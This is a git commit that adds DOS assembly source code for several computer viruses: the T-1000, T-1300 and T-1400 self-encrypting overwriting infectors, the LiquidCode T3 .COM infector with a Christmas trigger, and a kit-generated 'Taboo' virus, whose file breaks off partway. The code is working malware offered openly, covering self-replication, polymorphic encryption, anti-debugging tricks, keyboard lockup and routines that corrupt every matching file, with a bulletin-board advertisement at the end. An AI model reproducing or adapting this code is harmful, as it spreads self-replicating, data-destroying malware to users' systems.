Add files via upload
This commit is contained in:
parent
5dd4938a52
commit
3e7d2e8262
@ -0,0 +1,95 @@
|
|||
;
|
||||
; T-1000 Virus
|
||||
;
|
||||
; This virus is a Non-Resident Overwriting Self-Encrypting .COM File Inctector.
|
||||
; When an infected program is started, the virus will infect all files in the
|
||||
; current directory and use the time counter for its encryption. It displays
|
||||
; the text "T-1000" when it is ready infecting.
|
||||
|
||||
Code Segment para 'code'
|
||||
Assume Cs:Code,Ds:Code
|
||||
|
||||
Length Equ Offset EndByte-Offset Main
|
||||
|
||||
Org 100h
|
||||
|
||||
Main: Mov Si,Offset Decrypt
|
||||
Mov Di,Si
|
||||
Mov Cl,Offset EndByte-Offset Decrypt
|
||||
On2: Lodsb
|
||||
Db 34h
|
||||
Crypt Db 0
|
||||
Stosb
|
||||
Dec Cl
|
||||
Cmp Cl,0ffh
|
||||
Jne On2
|
||||
|
||||
Decrypt:
|
||||
Mov Ah,4eh
|
||||
Push Ax
|
||||
|
||||
Encr:
|
||||
Mov Ah,2ch
|
||||
Int 21h
|
||||
Mov Crypt,Dl
|
||||
Mov Si,Offset Decrypt
|
||||
Mov Di,Offset EndByte+10
|
||||
Mov Cx,Offset EndByte-Offset Decrypt
|
||||
On3: Lodsb
|
||||
Xor Al,Crypt
|
||||
Stosb
|
||||
Dec Cx
|
||||
Cmp Cx,0ffffh
|
||||
Jne On3
|
||||
|
||||
Pop Ax
|
||||
On1: Xor Cx,Cx
|
||||
Mov Dx,Offset Nam
|
||||
Int 21h
|
||||
Jc Einde
|
||||
|
||||
Mov Ax,3d01h
|
||||
Mov Dx,9eh
|
||||
Int 21h
|
||||
Mov Bx,Ax
|
||||
|
||||
Mov Ah,40h
|
||||
Push Ax
|
||||
Mov Cx,Offset Decrypt-Offset Main
|
||||
Mov Dx,Offset Main
|
||||
Int 21h
|
||||
|
||||
Pop Ax
|
||||
Mov Cx,Offset EndByte-Offset Decrypt
|
||||
Mov Dx,Offset EndByte+10
|
||||
Int 21h
|
||||
|
||||
Mov Ah,3eh
|
||||
Int 21h
|
||||
|
||||
Mov Ah,4fh
|
||||
Push Ax
|
||||
Jmp Short Encr
|
||||
|
||||
Einde:
|
||||
Mov Ah,9
|
||||
Mov Dx,Offset Msg
|
||||
Push Cs
|
||||
Pop Ds
|
||||
Int 21h
|
||||
Int 20h
|
||||
|
||||
Msg Db 'T-1000$'
|
||||
|
||||
Nam Db '*.Com',0
|
||||
|
||||
EndByte Db 0
|
||||
|
||||
Code Ends
|
||||
End Main
|
||||
|
||||
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
@ -0,0 +1,79 @@
|
|||
;
|
||||
; T-1300 Virus
|
||||
;
|
||||
; This is a non-resident overwriting self-encrypting semi-mutating .exe file
|
||||
; infector. When an infected program is run, the virus will infect all the
|
||||
; file in the current directory and displays "T-1300" when finished with
|
||||
; infecting. This is a bit more advanced virus than "T-1000" and a wildcard
|
||||
; scanstring is needed to find this virus.
|
||||
;
|
||||
S_1: Lea Si,Main
|
||||
Mov Cx,MainLen
|
||||
Length Equ $-2
|
||||
Decrypt: Xor B [Si],0
|
||||
CryptByte Equ $-1
|
||||
S_2 Equ $-2
|
||||
S_3: Inc Si
|
||||
S_4: Loop Decrypt
|
||||
CryptLen Equ $-S_1
|
||||
Main: Mov Ah,4eh
|
||||
SeekNext: Lea Dx,FileSpec
|
||||
Xor Cx,Cx
|
||||
Int 21h
|
||||
Jc Einde
|
||||
Mov Ax,3d02h
|
||||
Mov Dx,09eh
|
||||
Int 21h
|
||||
Xchg Ax,Bx
|
||||
Mov Ds,Cx
|
||||
Inc Cx
|
||||
Mov Ah,B Ds:[46ch]
|
||||
Mov Ds,Cs
|
||||
Mov B CryptByte,Ah
|
||||
Test Ah,1
|
||||
Jne NoReg
|
||||
Xor B S_1,Cl
|
||||
Xor B S_2,Cl
|
||||
Xor B S_3,Cl
|
||||
NoReg: Test Ah,2
|
||||
Jne NoXor
|
||||
Xor B Decrypt,2
|
||||
NoXor: Test Ah,4
|
||||
Jne NoLoop
|
||||
Xor B S_4,2
|
||||
NoLoop: Lea Si,Main
|
||||
Lea Di,CryptPart
|
||||
Mov Cx,MainLen
|
||||
Push Cx
|
||||
CodeIt: Lodsb
|
||||
Xor Al,Ah
|
||||
Stosb
|
||||
Loop CodeIt
|
||||
Pop Cx
|
||||
And Ax,03fffh
|
||||
Add Cx,Ax
|
||||
Mov W Length,Cx
|
||||
Mov Ah,40h
|
||||
Lea Dx,S_1
|
||||
Mov Cx,CryptLen
|
||||
Int 21h
|
||||
Mov Ah,40h
|
||||
Lea Dx,CryptPart
|
||||
Mov Cx,MainLen
|
||||
Int 21h
|
||||
Mov Ah,3eh
|
||||
Int 21h
|
||||
Mov Ah,4fh
|
||||
Jmp SeekNext
|
||||
Einde: Mov Ah,9
|
||||
Lea Dx,Msg
|
||||
Int 21h
|
||||
Ret
|
||||
|
||||
FileSpec Db '*.EXE',0
|
||||
|
||||
Msg Db 'T-1300$'
|
||||
|
||||
MainLen Equ $-Main
|
||||
|
||||
CryptPart Equ $
|
@ -0,0 +1,143 @@
|
|||
;
|
||||
; T-1400 Virus
|
||||
;
|
||||
; This is a non-resident overwriting self-encrypting semi-mutating .COM file
|
||||
; infector. When an infected program is run, the virus will infect all the
|
||||
; file in the current directory and displays a TridenT logo when finished with
|
||||
; infecting. This is a bit more advanced virus than "T-1300" and a wildcard
|
||||
; scanstring is needed to find this virus. It now utilizes three types of
|
||||
; encryption, instead of only the XOR loop. it now utilizes ADD, ADC, SUB and
|
||||
; SBB. the increment SI has now a new
|
||||
; possibility, CMPSB.
|
||||
;
|
||||
Beg:
|
||||
Mov Cx,MainLen
|
||||
Length Equ $-2
|
||||
S_1: Lea Si,Main
|
||||
Zaken: Clc
|
||||
Decrypt: Xor B [Si],0
|
||||
CryptByte Equ $-1
|
||||
S_2 Equ $-2
|
||||
S_3: Inc Si
|
||||
S_4: Loop Zaken
|
||||
CryptLen Equ $-Beg
|
||||
Main: Mov Ah,4eh
|
||||
SeekNext: Lea Dx,FileSpec
|
||||
Xor Cx,Cx
|
||||
Int 21h
|
||||
Jnc Yup
|
||||
Jmp Einde
|
||||
Yup: Mov Ax,3d02h
|
||||
Mov Dx,09eh
|
||||
Int 21h
|
||||
Xchg Ax,Bx
|
||||
Mov Ds,Cx
|
||||
Inc Cx
|
||||
Mov Ax,W Ds:[46ch]
|
||||
|
||||
Mov Ds,Cs
|
||||
Mov B CryptByte,Ah
|
||||
Mov B Zaken,0f8h
|
||||
|
||||
Mov B What,1
|
||||
Mov B S_2,34h
|
||||
Test Al,1
|
||||
Jne NotXor
|
||||
Test Al,32
|
||||
Jne Done
|
||||
Xor B Zaken,1
|
||||
Jmp Done
|
||||
NotXor: Mov B What,2
|
||||
Mov B S_2,04h
|
||||
Test Al,2
|
||||
Je Done
|
||||
Test Al,4
|
||||
Je ItsAdc
|
||||
Mov B What,3
|
||||
Mov B S_2,2ch
|
||||
Test Al,8
|
||||
Je Done
|
||||
Sub B S_2,20h
|
||||
ItsAdc: Add B S_2,10h
|
||||
Done: Mov B S_1,0beh
|
||||
Cmp Ah,80h
|
||||
Ja NoCMPSB
|
||||
Mov B S_3,0A6h
|
||||
Jmp Next
|
||||
NoCMPSB: Mov B S_3,46h
|
||||
Next: Test Ah,1
|
||||
Jne NoReg
|
||||
Xor B S_1,Cl
|
||||
Xor B S_2,Cl
|
||||
Cmp Ah,80h
|
||||
Jbe NoReg
|
||||
Xor B S_3,Cl
|
||||
NoReg: Test Ah,2
|
||||
Jne NoXor
|
||||
Xor B Decrypt,2
|
||||
NoXor: Test Ah,4
|
||||
Jne NoLoop
|
||||
Xor B S_4,2
|
||||
NoLoop: Test Ah,8
|
||||
Jne Ok
|
||||
Mov B S_4,0E2h
|
||||
Ok: Lea Si,Main
|
||||
Lea Di,CryptPart
|
||||
Mov Cx,MainLen
|
||||
Push Cx
|
||||
CodeIt: Lodsb
|
||||
Cmp B What,1
|
||||
Jne NeXor
|
||||
Xor Al,Ah
|
||||
Jmp Stor
|
||||
NeXor: Cmp B What,2
|
||||
Jne NeSub
|
||||
Sub Al,Ah
|
||||
Jmp Stor
|
||||
NeSub: Add Al,Ah
|
||||
Stor: Stosb
|
||||
Loop CodeIt
|
||||
Pop Cx
|
||||
And Ax,03fffh
|
||||
Add Cx,Ax
|
||||
Mov W Length,Cx
|
||||
Mov Ah,40h
|
||||
Lea Dx,Beg
|
||||
Mov Cx,CryptLen
|
||||
Int 21h
|
||||
Mov Ah,40h
|
||||
Lea Dx,CryptPart
|
||||
Mov Cx,MainLen
|
||||
Int 21h
|
||||
Mov Ah,3eh
|
||||
Int 21h
|
||||
Mov Ah,4fh
|
||||
Jmp SeekNext
|
||||
What Db 0
|
||||
Einde:
|
||||
Mov Al,3
|
||||
Int 10h
|
||||
Lea Si,Y
|
||||
R: Lodsb
|
||||
Mov Cl,8
|
||||
C: Rol Al,1
|
||||
Push Ax
|
||||
Mov Al,32
|
||||
If C Mov Al,219
|
||||
Int 29h
|
||||
Int 29h
|
||||
Pop Ax
|
||||
Loop C
|
||||
Cmp Si,E
|
||||
Jne R
|
||||
Ret
|
||||
Y: db 125,231,121,244,95,17,18,69,6,68,17,226,69,197,68,17,18,69,4,196,17,23,121,244,68
|
||||
E:
|
||||
|
||||
FileSpec Db '*.COM',0
|
||||
|
||||
Msg Db 'T-1400'
|
||||
|
||||
MainLen Equ $-Main
|
||||
|
||||
CryptPart Equ $
|
@ -0,0 +1,361 @@
|
|||
;LiquidCode --- T3
|
||||
;
|
||||
; Virus
|
||||
;This version:
|
||||
;Searches current directory for non-infected com files, if any found
|
||||
;it will become infected!
|
||||
;This virus has a routine which self-destructs itself and uninfects
|
||||
;the file.
|
||||
assume cs:code
|
||||
.286
|
||||
code segment "code"
|
||||
org 0100h
|
||||
start proc
|
||||
jmp v_start ;first 5 bytes |
|
||||
nop ; |
|
||||
nop ; |
|
||||
v_start:
|
||||
call $+3 ;Actual virus
|
||||
pop dx
|
||||
sub dx, 3
|
||||
push dx ;save relocation factor in BP
|
||||
pop bp ;so virus can be copied anywhere twoards
|
||||
mov si, dx ;the end of the file
|
||||
;
|
||||
; Replace first 5 bytes in memory with original
|
||||
; program code so normal program can run later
|
||||
add si, first_five
|
||||
mov di, 0100h
|
||||
mov cx, 5
|
||||
lodsb
|
||||
stosb
|
||||
loop $-2
|
||||
;see if user want to disinfect this file
|
||||
; mov si, 82h
|
||||
; lodsb
|
||||
; cmp al, "[" ;is al the code to disinfect? "["
|
||||
; jne ok_dont_disinfect
|
||||
; jmp self_kill
|
||||
ok_dont_disinfect:
|
||||
;here should be date checks to see
|
||||
;if an evil function should be unleashed!!
|
||||
mov ah, 2ah
|
||||
int 21h
|
||||
;cx year 1980-2099
|
||||
;dh month 1-12
|
||||
;dl day
|
||||
;al day of week 0=sun 1=mon -> 7=sat
|
||||
cmp dh, 12
|
||||
jne notdec
|
||||
cmp dl, 25
|
||||
jne notdec
|
||||
jmp christmas
|
||||
notdec:
|
||||
cmp dh, 4
|
||||
jne notapril
|
||||
cmp dl, 1
|
||||
jne notapril
|
||||
; jmp aprilfools
|
||||
notapril:
|
||||
|
||||
;Set the DTA
|
||||
call set_dta
|
||||
;find first file to ?infect?
|
||||
call find_first_file
|
||||
go_again:
|
||||
mov si, bp
|
||||
add si, size_
|
||||
lodsw
|
||||
cmp ax, 5
|
||||
ja gd4
|
||||
jmp resrch
|
||||
gd4:
|
||||
call open_file
|
||||
mov bx, ax
|
||||
mov al, 0
|
||||
call date_time
|
||||
mov ah, 3fh
|
||||
mov cx, 5
|
||||
mov dx, bp
|
||||
add dx, first_five
|
||||
int 21h
|
||||
;**** mov ax, 4202h
|
||||
mov cx, 0
|
||||
mov ax, 4202h
|
||||
mov dx, cx
|
||||
int 21h
|
||||
sub ax, 3
|
||||
mov si, bp
|
||||
add si, new_5
|
||||
mov [si+1], ax
|
||||
mov si, bp
|
||||
mov di, si
|
||||
add si, chkmark
|
||||
add di, mark
|
||||
mov cx, 2
|
||||
repe cmpsb
|
||||
jne INFECT
|
||||
;File found was previously infected!
|
||||
; search for new one now.
|
||||
jmp resrch
|
||||
|
||||
wipe_name:
|
||||
push di
|
||||
push ax
|
||||
push cx
|
||||
mov di, bp
|
||||
add di, name_
|
||||
mov cx, 13
|
||||
mov al, 0
|
||||
rep stosb
|
||||
pop cx
|
||||
pop ax
|
||||
pop di
|
||||
ret
|
||||
resrch:
|
||||
call wipe_name
|
||||
mov ah, 4fh
|
||||
int 21h
|
||||
jnc gd3
|
||||
jmp term_virus
|
||||
gd3:
|
||||
jmp go_again
|
||||
INFECT:
|
||||
;Time to infect the file!!
|
||||
mov si, bp
|
||||
add si, handle
|
||||
mov bx, [si]
|
||||
mov cx, vsize
|
||||
mov dx, bp
|
||||
call wipe_name
|
||||
mov ax, 4000h
|
||||
int 21h
|
||||
mov ax, 4200h
|
||||
mov cx, 0
|
||||
mov dx, cx
|
||||
int 21h
|
||||
mov dx, bp
|
||||
add dx, new_5
|
||||
mov ax, 4000h
|
||||
mov cx, 5
|
||||
int 21h
|
||||
mov al, 1
|
||||
call date_time
|
||||
mov ax, 3e00h
|
||||
int 21h
|
||||
jmp resrch
|
||||
|
||||
fndnam proc
|
||||
mov si, env
|
||||
mov ax, [si]
|
||||
mov es, ax
|
||||
mov ds, ax
|
||||
mov si, 0
|
||||
mov di, si
|
||||
__lp:
|
||||
lodsb
|
||||
cmp al, 0
|
||||
je chknxt
|
||||
stosb
|
||||
jmp __lp
|
||||
chknxt:
|
||||
stosb
|
||||
lodsb
|
||||
cmp al, 0
|
||||
je fnd1
|
||||
stosb
|
||||
jmp __lp
|
||||
fnd1:
|
||||
stosb
|
||||
__lp2:
|
||||
lodsb
|
||||
cmp al, "a"
|
||||
jae ff_
|
||||
up2:
|
||||
cmp al, "A"
|
||||
jae fff_
|
||||
up3:
|
||||
stosb
|
||||
jmp __lp2
|
||||
ff_:
|
||||
cmp al,"z"
|
||||
jbe fnd
|
||||
jmp up2
|
||||
fff_:
|
||||
cmp al, "Z"
|
||||
jbe fnd
|
||||
jmp up3
|
||||
fnd:
|
||||
mov si, di
|
||||
mov al, 0
|
||||
repne scasb
|
||||
mov dx, si
|
||||
mov di, dx
|
||||
ret
|
||||
env equ 2ch
|
||||
fndnam endp
|
||||
|
||||
|
||||
self_kill:
|
||||
;this procedure disinfects specified files
|
||||
;SI points to the name of current file on disk
|
||||
;which is infected
|
||||
call fndnam ;find name of current file from env block in memory
|
||||
jmp gd__
|
||||
abrt:
|
||||
int 20h
|
||||
gd__:
|
||||
mov ax, 3d02h
|
||||
int 21h
|
||||
jc abrt
|
||||
mov bx, ax
|
||||
mov ax, cs
|
||||
mov ds, ax
|
||||
mov es, ax
|
||||
mov cx, 5
|
||||
mov dx, bp
|
||||
add dx, first_five
|
||||
call wipe_name
|
||||
mov ax, 4000h
|
||||
int 21h
|
||||
jc abrt
|
||||
mov dx, 0
|
||||
mov cx, 0
|
||||
mov ax, 4202h
|
||||
int 21h
|
||||
jnc gd__1
|
||||
jmp abrt
|
||||
gd__1:
|
||||
sub ax, vsize
|
||||
mov dx, ax
|
||||
mov cx, 0
|
||||
mov ax, 4200h
|
||||
int 21h
|
||||
call wipe_name
|
||||
mov cx, 0
|
||||
mov ax, 4000h
|
||||
int 21h
|
||||
mov ax, 3e00h
|
||||
int 21h
|
||||
jmp term_virus
|
||||
date_time:
|
||||
pusha
|
||||
mov ah, 57h
|
||||
cmp al, 0
|
||||
je fnd__$
|
||||
mov di, bp
|
||||
mov si, di
|
||||
add di, date
|
||||
add si, time
|
||||
mov dx, [di]
|
||||
mov cx, [si]
|
||||
int 21h
|
||||
jmp ret__
|
||||
fnd__$:
|
||||
int 21h
|
||||
mov si, bp
|
||||
mov di, bp
|
||||
add si, time
|
||||
add di, date
|
||||
mov [si], cx
|
||||
mov [di], dx
|
||||
ret__:
|
||||
popa
|
||||
ret
|
||||
open_file:
|
||||
mov dx, bp
|
||||
add dx, name_
|
||||
mov ax, 3d02h
|
||||
int 21h
|
||||
jnc gd2
|
||||
jmp term_virus
|
||||
gd2:
|
||||
mov si, bp
|
||||
add si, handle
|
||||
mov [si], ax
|
||||
ret
|
||||
find_first_file:
|
||||
mov dx, bp
|
||||
mov cx, 0
|
||||
mov ah, 4eh
|
||||
add dx, all_com_files
|
||||
int 21h
|
||||
jnc gd1
|
||||
jmp term_virus
|
||||
gd1:
|
||||
ret
|
||||
set_dta:
|
||||
mov dx, bp
|
||||
mov ah, 1ah
|
||||
add dx, dta
|
||||
int 21h
|
||||
ret
|
||||
term_virus:
|
||||
mov ax, 0
|
||||
mov bx, ax
|
||||
mov cx, bx
|
||||
mov dx, cx
|
||||
mov si, 0100h
|
||||
mov di, -1
|
||||
mov bp, di
|
||||
push 0100h
|
||||
ret
|
||||
|
||||
CHRISTMAS:
|
||||
;Program Lockup
|
||||
; Exit without running program
|
||||
int 20h
|
||||
;APRILFOOLS:
|
||||
;Ha Ha delete current file
|
||||
; call fndnam
|
||||
; mov ah, 41h
|
||||
; int 21h
|
||||
; mov ax, cs
|
||||
; mov ds, ax
|
||||
; mov es, ax
|
||||
; jmp term_virus
|
||||
; Data Bank
|
||||
_fstfive:
|
||||
int 20h
|
||||
nop
|
||||
ckmrk:
|
||||
nop
|
||||
nop
|
||||
acf db "*.COM",0
|
||||
dt_ dw 0
|
||||
tme dw 0
|
||||
d_t_a:
|
||||
rfd db 21 dup (0)
|
||||
att db 0
|
||||
dw 0
|
||||
dw 0
|
||||
sz dd 0
|
||||
n_me db 13 dup (0),0
|
||||
handl dw 0
|
||||
nw_5 db 0e9h,0,0
|
||||
mrk db "<T3> "
|
||||
strain db "<tm>LiquidCode 92"
|
||||
;
|
||||
end___:
|
||||
first_five = offset _fstfive-0105h
|
||||
all_com_files = offset acf-0105h
|
||||
dta = offset d_t_a-0105h
|
||||
attribute = offset att-0105h
|
||||
time = offset tme-0105h
|
||||
date = offset dt_-0105h
|
||||
size_ = offset sz-0105h
|
||||
name_ = offset n_me-0105h
|
||||
handle = offset handl-0105h
|
||||
new_5 = offset nw_5-0105h
|
||||
mark = offset mrk-0105h
|
||||
chkmark = offset ckmrk-0105h
|
||||
vsize = offset end___-0105h
|
||||
start endp
|
||||
code ends
|
||||
end start
|
||||
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
@ -0,0 +1,539 @@
|
|||
; TABOO.ASM -- Taboo Virus
|
||||
; Created with Nowhere Man's Virus Creation Laboratory v1.00
|
||||
; Written by Virucidal Maniac
|
||||
|
||||
virus_type equ 2 ; Spawning Virus
|
||||
is_encrypted equ 1 ; We're encrypted
|
||||
tsr_virus equ 0 ; We're not TSR
|
||||
|
||||
code segment byte public
|
||||
assume cs:code,ds:code,es:code,ss:code
|
||||
org 0100h
|
||||
|
||||
start label near
|
||||
|
||||
main proc near
|
||||
call encrypt_decrypt ; Decrypt the virus
|
||||
|
||||
start_of_code label near
|
||||
|
||||
stop_tracing: mov cx,09EBh
|
||||
mov ax,0FE05h ; Acutal move, plus a HaLT
|
||||
jmp $-2
|
||||
add ah,03Bh ; AH now equals 025h
|
||||
jmp $-10 ; Execute the HaLT
|
||||
mov bx,offset null_vector ; BX points to new routine
|
||||
push cs ; Transfer CS into ES
|
||||
pop es ; using a PUSH/POP
|
||||
int 021h
|
||||
mov al,1 ; Disable interrupt 1, too
|
||||
int 021h
|
||||
jmp short skip_null ; Hop over the loop
|
||||
null_vector: jmp $ ; An infinite loop
|
||||
skip_null: mov byte ptr [lock_keys + 1],130 ; Prefetch unchanged
|
||||
lock_keys: mov al,128 ; Change here screws DEBUG
|
||||
out 021h,al ; If tracing then lock keyboard
|
||||
|
||||
|
||||
mov ah,04Ah ; DOS resize memory function
|
||||
mov bx,(finish - start) / 16 + 0272h ; BX holds # of para.
|
||||
int 021h
|
||||
|
||||
mov sp,(finish - start) + 01100h ; Change top of stack
|
||||
|
||||
mov si,offset spawn_name ; SI points to true filename
|
||||
int 02Eh ; DOS execution back-door
|
||||
push ax ; Save return value for later
|
||||
|
||||
mov ax,cs ; AX holds code segment
|
||||
mov ds,ax ; Restore data segment
|
||||
mov es,ax ; Restore extra segment
|
||||
|
||||
mov cx,0003h ; Do 3 infections
|
||||
search_loop: push cx ; Save CX
|
||||
call search_files ; Find and infect a file
|
||||
pop cx ; Restore CX
|
||||
loop search_loop ; Repeat until CX is 0
|
||||
|
||||
xor ah,ah ; BIOS get time function
|
||||
int 01Ah
|
||||
test dx,0001h ; Is timer divisible by 2?
|
||||
jne no_infection ; If not then don't spread
|
||||
call search_files ; Find and infect a file
|
||||
no_infection:
|
||||
call get_day
|
||||
cmp ax,000Fh ; Did the function return 15?
|
||||
je strt00 ; If equal, do effect
|
||||
call get_cpu
|
||||
cmp ax,01E6h ; Did the function return 486?
|
||||
je strt00 ; If equal, do effect
|
||||
jmp end00 ; Otherwise skip over it
|
||||
strt00: xor ah,ah ; BIOS get time function
|
||||
int 1Ah
|
||||
xchg dx,ax ; AX holds low word of timer
|
||||
mov dx,0FFh ; Start with port 255
|
||||
out_loop: out dx,al ; OUT a value to the port
|
||||
dec dx ; Do the next port
|
||||
jne out_loop ; Repeat until DX = 0
|
||||
|
||||
end00: call get_minute
|
||||
cmp ax,001Eh ; Did the function return 30?
|
||||
jg strt01 ; If greater, do effect
|
||||
jmp end01 ; Otherwise skip over it
|
||||
strt01: mov cx,000Ah ; First argument is 10
|
||||
new_shot: push cx ; Save the current count
|
||||
mov dx,0140h ; DX holds pitch
|
||||
mov bx,0100h ; BX holds shot duration
|
||||
in al,061h ; Read the speaker port
|
||||
and al,11111100b ; Turn off the speaker bit
|
||||
fire_shot: xor al,2 ; Toggle the speaker bit
|
||||
out 061h,al ; Write AL to speaker port
|
||||
add dx,09248h ;
|
||||
mov cl,3 ;
|
||||
ror dx,cl ; Figure out the delay time
|
||||
mov cx,dx ;
|
||||
and cx,01FFh ;
|
||||
or cx,10 ;
|
||||
shoot_pause: loop shoot_pause ; Delay a bit
|
||||
dec bx ; Are we done with the shot?
|
||||
jnz fire_shot ; If not, pulse the speaker
|
||||
and al,11111100b ; Turn off the speaker bit
|
||||
out 061h,al ; Write AL to speaker port
|
||||
mov bx,0002h ; BX holds delay time (ticks)
|
||||
xor ah,ah ; Get time function
|
||||
int 1Ah ; BIOS timer interrupt
|
||||
add bx,dx ; Add current time to delay
|
||||
shoot_delay: int 1Ah ; Get the time again
|
||||
cmp dx,bx ; Are we done yet?
|
||||
jne shoot_delay ; If not, keep checking
|
||||
pop cx ; Restore the count
|
||||
loop new_shot ; Do another shot
|
||||
|
||||
end01: call get_rollover
|
||||
cmp ax,0001h ; Did the function return 1?
|
||||
je strt02 ; If equal, do effect
|
||||
jmp end02 ; Otherwise skip over it
|
||||
strt02: mov dx,00C8h ; First argument is 200
|
||||
push es ; Save ES
|
||||
mov ax,040h ; Set extra segment to 040h
|
||||
mov es,ax ; (ROM BIOS)
|
||||
mov word ptr es:[013h],dx ; Store new RAM ammount
|
||||
pop es ; Restore ES
|
||||
|
||||
end02: call get_day
|
||||
cmp ax,0007h ; Did the function return 7?
|
||||
jg strt03 ; If greater, do effect
|
||||
jmp end03 ; Otherwise skip over it
|
||||
strt03: xor bx,bx ; Clear BX
|
||||
mov si,0001h ; Second argument is 1
|
||||
push es ; Save ES
|
||||
xor ax,ax ; Set the extra segment to
|
||||
mov es,ax ; zero (ROM BIOS)
|
||||
shl bx,1 ; Convert to word index
|
||||
shl si,1 ; Convert to word index
|
||||
mov ax,word ptr [bx + 03FEh]; Zero COM port address
|
||||
xchg word ptr [si + 03FEh],ax; Put first value in second,
|
||||
mov word ptr [bx + 03FEh],ax; and second value in first!
|
||||
pop es ; Restore ES
|
||||
|
||||
end03: call get_dos_version
|
||||
or ax,ax ; Did the function return zero?
|
||||
jg strt04 ; If greater, do effect
|
||||
jmp end04 ; Otherwise skip over it
|
||||
strt04: mov dx,offset data00 ; DX points to data
|
||||
push bp ; Save BP
|
||||
mov bp,sp ; BP points to stack frame
|
||||
sub sp,4096 ; Allocate 4096-byte buffer
|
||||
push di ; Save DI
|
||||
mov ah,02Fh ; DOS get DTA function
|
||||
int 021h
|
||||
mov di,bx ; DI points to DTA
|
||||
mov ah,04Eh ; DOS find first file function
|
||||
mov cx,00100111b ; CX holds all file attributes
|
||||
int 021h
|
||||
jc corrupt_end ; If no files found then exit
|
||||
corrupt_file: mov ax,04301h ; DOS set file attributes function
|
||||
xor cx,cx ; File will have no attributes
|
||||
lea dx,[di + 01Eh] ; DX points to file name
|
||||
int 021h
|
||||
mov ax,03D02h ; DOS open file function, r/w
|
||||
lea dx,[di + 01Eh] ; DX points to file name
|
||||
int 021h
|
||||
xchg bx,ax ; Transfer file handle to AX
|
||||
c_crypt_loop: mov ah,03Fh ; DOS read from file function
|
||||
mov cx,4096 ; Read 4k of characters
|
||||
lea dx,[bp - 4096] ; DX points to the buffer
|
||||
int 021h
|
||||
or ax,ax ; Were 0 bytes read?
|
||||
je close_c_file ; If so then close it up
|
||||
push ax ; Save AX
|
||||
lea si,[bp - 4096] ; SI points to the buffer
|
||||
xor ah,ah ; BIOS get clock ticks function
|
||||
int 01Ah
|
||||
pop cx ; CX holds number of bytes read
|
||||
push cx ; Save CX
|
||||
corrupt_bytes: xor byte ptr [si],dl ; XOR byte by clock ticks
|
||||
inc si ; Do the next byte
|
||||
inc dx ; Change the key for next byte
|
||||
loop corrupt_bytes ; Repeat until buffer is done
|
||||
pop dx ; Restore DX (holds bytes read)
|
||||
push dx ; Save count for write
|
||||
mov ax,04201h ; DOS file seek function, current
|
||||
mov cx,0FFFFh ; Seeking backwards
|
||||
neg dx ; Seeking backwards
|
||||
int 021h
|
||||
mov ah,040h ; DOS write to file function
|
||||
pop cx ; CX holds number of bytes read
|
||||
lea dx,[bp - 4096] ; DX points to the buffer
|
||||
int 021h
|
||||
jmp short c_crypt_loop
|
||||
close_c_file: mov ax,05701h ; DOS set file date/time function
|
||||
mov cx,[di + 016h] ; CX holds old file time
|
||||
mov dx,[di + 018h] ; DX holds old file data
|
||||
int 021h
|
||||
mov ah,03Eh ; DOS close file function
|
||||
int 021h
|
||||
mov ax,04301h ; DOS set file attributes function
|
||||
xor ch,ch ; Clear CH for attributes
|
||||
mov cl,[di + 015h] ; CL holds old attributes
|
||||
lea dx,[di + 01Eh] ; DX points to file name
|
||||
int 021h
|
||||
mov ah,04Fh ; DOS find next file function
|
||||
int 021h
|
||||
jnc corrupt_file ; If successful do next file
|
||||
corrupt_end: pop di ; Restore DI
|
||||
mov sp,bp ; Deallocate local buffer
|
||||
pop bp ; Restore BP
|
||||
|
||||
end04: pop ax ; AL holds return value
|
||||
mov ah,04Ch ; DOS terminate function
|
||||
int 021h
|
||||
main endp
|
||||
|
||||
|
||||
db 0C3h,0FDh,0C2h,0F3h,0C7h
|
||||
|
||||
search_files proc near
|
||||
push bp ; Save BP
|
||||
mov bp,sp ; BP points to local buffer
|
||||
sub sp,64 ; Allocate 64 bytes on stack
|
||||
|
||||
mov ah,047h ; DOS get current dir function
|
||||
xor dl,dl ; DL holds drive # (current)
|
||||
lea si,[bp - 64] ; SI points to 64-byte buffer
|
||||
int 021h
|
||||
|
||||
mov ah,03Bh ; DOS change directory function
|
||||
mov dx,offset root ; DX points to root directory
|
||||
int 021h
|
||||
|
||||
call traverse ; Start the traversal
|
||||
|
||||
mov ah,03Bh ; DOS change directory function
|
||||
lea dx,[bp - 64] ; DX points to old directory
|
||||
int 021h
|
||||
|
||||
mov sp,bp ; Restore old stack pointer
|
||||
pop bp ; Restore BP
|
||||
ret ; Return to caller
|
||||
|
||||
root db "\",0 ; Root directory
|
||||
search_files endp
|
||||
|
||||
traverse proc near
|
||||
push bp ; Save BP
|
||||
|
||||
